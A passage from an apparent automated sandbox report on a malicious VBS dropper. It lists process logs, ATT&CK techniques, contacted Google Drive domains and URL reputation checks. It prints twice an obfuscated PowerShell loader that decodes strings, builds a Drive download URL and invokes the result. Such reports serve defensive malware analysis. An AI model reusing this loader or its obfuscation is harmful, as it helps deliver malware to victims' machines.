o.g.wspe obh cm,laliwoe n at');$rengringsmidlets+=$fuset[1];convictively ($rengringsmidlets);convictively (reeling 'no$s,ob.pbagmor.aaf vboe x.,ehsketrakddtae .ra,s s[be$got,arm,ibiaknt ko sm ritic.ri ft yde]l.=f.$ blafipogarnf,i anelgovsfo ');$promachos=reeling ' s$oso ,p ggcoru,agsvskek,.frdino ,wprnb,lofo rakadgaf,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility';if (${host}.currentculture) {$reinvigorate++;}function reeling($takkende){$mjavende=$takkende.length-$reinvigorate;$neocortical='substri';$neocortical+='ng';for( $kngtende=2;$kngtende -lt $mjavende;$kngtende+=3){$aflytningsudstyrene+=$takkende.$neocortical.invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function convictively($mispainted){ . ($aabningstid) ($mispainted);}$lignings=reeling ' ,mhwo,ozscicolp,lkiaov/sh5f..ta0en f(sew ainontcdciob,wh,ste fln ktsk fi1.y0fo.c 0ly;u. ,wstispn l6be4ei; , .kx u6 ,4,i;in lorinvun: a1ac2ag1f .be0,i)af ,og aesickakdeo s/sk2ir0ny1ol0ou0op1fl0sa1k, defreireryderafeso,axop/ u1 s2 ,1sk.be0m, ';$triatomicity=reeling 'inup s,ue srca-noaoeg iefinvat a ';$undgldes=reeling ' fh at,etcep ks p:in/dr/sed,lrt,io.vsuech. vgvao ,opegbalcaee .lecfros,m.a/m.u ecse?b,e,hx npdioa,r.atln=podwaor.ws,ngol gos a.rd t&f,isjdst= p1anx swobi.ar rdiel,g ytafx .8ude ,qpuutii.semazwhqse- fqt.rla9prkstkmehre3prqmuyaf6 ,a digos.gxsu ';$alytes=reeling ' g>p. ';$aabningstid=reeling ',ris.e axes ';$proboscidiferous='betoningerne';$friluftsmenneskerne = reeling ' uenyci.h,ro . p%una mpgop.nd.oa,rtomad.%za\agnsporenzic,hos nhaga,egesdrta,im ob.nha.a fraorer.e la&ta&se baeinca.hunopr sntns ';convictively (reeling 'di$tigfoltuowab ea olha:,lf u vs hesttta=a ( ccsumtrdps ho/encf. u$ rf .r .i ,leuu uf vtstsspmdee fnsunfaearsrokovegyrfan ,e .) ');convictively (reeling 're$.egb l iob.bplapil s: r,oi mvenin nini .afanfo=sp$aiucyn tdcag.pl rdreehysno.syscopirl .isyt .( $olaiml,hygrt ue es s) ');convictively (reeling 'd,[glnk.ekatsu.oxs sekerkov.oi.aco e fpheok i,onpet .mbaabln ,a gelebir u]bl:c.:sqsste.eck.ubarn,ipit y bpner eo ftf ozycpuo tl.n r =dr ca[dintrekrtdy.u,smeerecsuufrru iint iyscpb rexo.st o pclaoqultrtalybopste l] v:tu:,ft mlm sb,1y 2 u ');$undgldes=$rivinian[0];$rengringsmidlets= (reeling 'pu$q,gbal ,olubp.an,lpi:meom,phags.rvea.ivgues.= ,n neryw .-,lo db bj menocaptde fss.yposudtc,egom.d.hvn seint o.g.wspe obh cm,laliwoe n at');$rengringsmidlets+=$fuset[1];convictively ($rengringsmidlets);convictively (reeling 'no$s,ob.pbagmor.aaf vboe x.,ehsketrakddtae .ra,s s[be$got,arm,ibiaknt ko sm ritic.ri ft yde]l.=f.$ blafipogarnf,i anelgovsfo ');$promachos=reeling ' s$oso ,p ggcoru,agsvskek,.frdino ,wprnb,lofo rakadgaf,niJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting            		Valid Accounts1
            Windows Management Instrumentation            		121
            Scripting            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts21
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		21
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Exploitation for Client Execution            		Logon Script (Windows)Logon Script (Windows)11
            Process Injection            		Security Account Manager21
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets13
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Software Packing            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            2669976595_366408723_KHI_SOF_240702_0957_P.vbs3%ReversingLabsWin32.Dropper.Generic

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            drive.usercontent.google.com1%VirustotalBrowse
            drive.google.com0%VirustotalBrowse
            windowsupdatebg.s.llnwi.net0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://drive.usercontent.googh0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://drive.usercontent.google.com0%Avira URL Cloudsafe
            https://drive.goog0%Avira URL Cloudsafe
            https://drive.google.com/uc?ex0%Avira URL Cloudsafe
            https://drive.google.com/u0%Avira URL Cloudsafe
            https://drive.usercontent.google.comh0%Avira URL Cloudsafe
            https://drive.goog1%VirustotalBrowse
            https://drive.googP0%Avira URL Cloudsafe
            http://drive.usercontent.google.com1%VirustotalBrowse
            http://drive.google.com0%Avira URL Cloudsafe
            https://drive.google.com/uc?ex2%VirustotalBrowse
            https://drive.google.0%Avira URL Cloudsafe
            https://drive.go0%Avira URL Cloudsafe
            https://drive.google.com/u0%VirustotalBrowse
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            https://drive.goo0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://drive.g0%Avira URL Cloudsafe
            https://www.google.com0%VirustotalBrowse
            https://drive.google.0%VirustotalBrowse
            https://github.com/Pester/Pester1%VirustotalBrowse
            http://drive.google.com0%VirustotalBrowse
            https://drive.google.com/uc0%Avira URL Cloudsafe
            http://crl.micro0%Avira URL Cloudsafe
            https://drive.goo0%VirustotalBrowse
            https://drive.google.com/0%Avira URL Cloudsafe
            https://drive.googl0%Avira URL Cloudsafe
            https://drive.google.com/uc?e0%Avira URL Cloudsafe
            https://drive.google.com0%Avira URL Cloudsafe
            https://drive.usercontent.google.com0%Avira URL Cloudsafe
            https://drive.google.c0%Avira URL Cloudsafe
            http://crl.microsoftuP0%Avira URL Cloudsafe
            https://drive.google.com/uc?0%Avira URL Cloudsafe
            https://drive.google.com/uc?e2%VirustotalBrowse
            https://drive.google.com/uc1%VirustotalBrowse
            https://drive.google.com1%VirustotalBrowse
            https://drive.usercontent.google.com1%VirustotalBrowse
            https://drive.google0%Avira URL Cloudsafe
            https://drive.google.com/uc?0%VirustotalBrowse
            https://drive.google.co0%Avira URL Cloudsafe
            https://drive.google.co0%VirustotalBrowse
            https://drive.google0%VirustotalBrowse
            https://drive.google.com/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.186.78
            		truefalseunknown
            drive.usercontent.google.com
            		142.250.186.161
            		truefalseunknown
            windowsupdatebg.s.llnwi.net
            		87.248.204.0
            		truefalseunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://drive.usercontent.google.compowershell.exe, 00000009.00000002.2663304130.00000247E578C000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.googpowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.com/uc?expowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/upowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://go.micropowershell.exe, 00000009.00000002.2663304130.00000247E4C01000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.usercontent.google.comhpowershell.exe, 00000009.00000002.2663304130.00000247E3E49000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.googPpowershell.exe, 00000009.00000002.2663304130.00000247E574F000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.usercontent.googhpowershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://drive.google.compowershell.exe, 00000009.00000002.2663304130.00000247E5752000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.gopowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2662155964.00000000051D6000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.goopowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.compowershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.gpowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/ucpowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.micropowershell.exe, 0000000D.00000002.2673202295.0000000007BA0000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore6lBpowershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.com/powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.googlpowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/uc?epowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2666861261.00000000060E1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.google.compowershell.exe, 00000009.00000002.2663304130.00000247E3DEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E56F3000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.usercontent.google.compowershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.cpowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://aka.ms/pscore68powershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://apis.google.compowershell.exe, 00000009.00000002.2663304130.00000247E5779000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E3E45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2663304130.00000247E5775000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://crl.microsoftuPpowershell.exe, 0000000D.00000002.2673202295.0000000007C53000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.com/uc?powershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.2663304130.00000247E3981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2662155964.0000000005081000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://drive.googlepowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://drive.google.copowershell.exe, 00000009.00000002.2663304130.00000247E4DF0000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            142.250.186.78
            		drive.google.comUnited States
            		15169GOOGLEUSfalse
            142.250.186.161
            		drive.usercontent.google.comUnited States
            		15169GOOGLEUSfalse

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1466659
            Start date and time:2024-07-03 08:51:56 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 57s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:2669976595_366408723_KHI_SOF_240702_0957_P.vbs
            Detection:MAL
            Classification:mal96.troj.expl.evad.winVBS@9/7@2/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 44
            • Number of non-executed functions: 5
            Cookbook Comments:
            • Found application associated with file extension: .vbs

            Warnings

            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 87.248.204.0
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 1296 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 3552 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            02:52:49API Interceptor1x Sleep call for process: wscript.exe modified
            02:54:43API Interceptor82x Sleep call for process: powershell.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            windowsupdatebg.s.llnwi.nethttps://metamesklogni.webflow.io/Get hashmaliciousUnknownBrowse
            • 95.140.236.128
            https://steaemcoonmmunnltly.com/g-friend/golo/gifts-50Get hashmaliciousUnknownBrowse
            • 178.79.238.0
            https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbsGet hashmaliciousHTMLPhisherBrowse
            • 87.248.204.0
            http://dana-aktivasi-paylater.myindo.me/Get hashmaliciousUnknownBrowse
            • 46.228.146.0
            http://multichaindappsx.pages.dev/Get hashmaliciousUnknownBrowse
            • 87.248.204.0
            http://bombeirosamora-my.sharepoint.com/:o:/g/personal/geral_comando_bombeirosamora_pt/EqT53jeWO6ZGkv1O_1FowosB2CSGfrKDmTZiEPPt31Ds7gGet hashmaliciousHTMLPhisherBrowse
            • 87.248.205.0
            https://equifax.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=dcsdataquality%40equifax.com&p=dd344d89-e9f0-4ad2-b235-09d9246d1e0f#v=3.0.0&d=https%3A%2F%2Fapi.virtru.com%2Fstorage%2Fapi%2Fpolicies%2Fdd344d89-e9f0-4ad2-b235-09d9246d1e0f%2Fdata%2Fmetadata&dk=6iPNYDhOZu4bgqt2whRHwXK7U%2FAD3%2BLSMPIUpzwYeKw%3DGet hashmaliciousUnknownBrowse
            • 87.248.204.0
            https://t.ly/HfK6YGet hashmaliciousUnknownBrowse
            • 87.248.205.0
            test.pdf.lnk.mal.lnkGet hashmaliciousUnknownBrowse
            • 178.79.238.0
            file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
            • 41.63.96.128

            ASNs

            No context

            JA3 Fingerprints

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
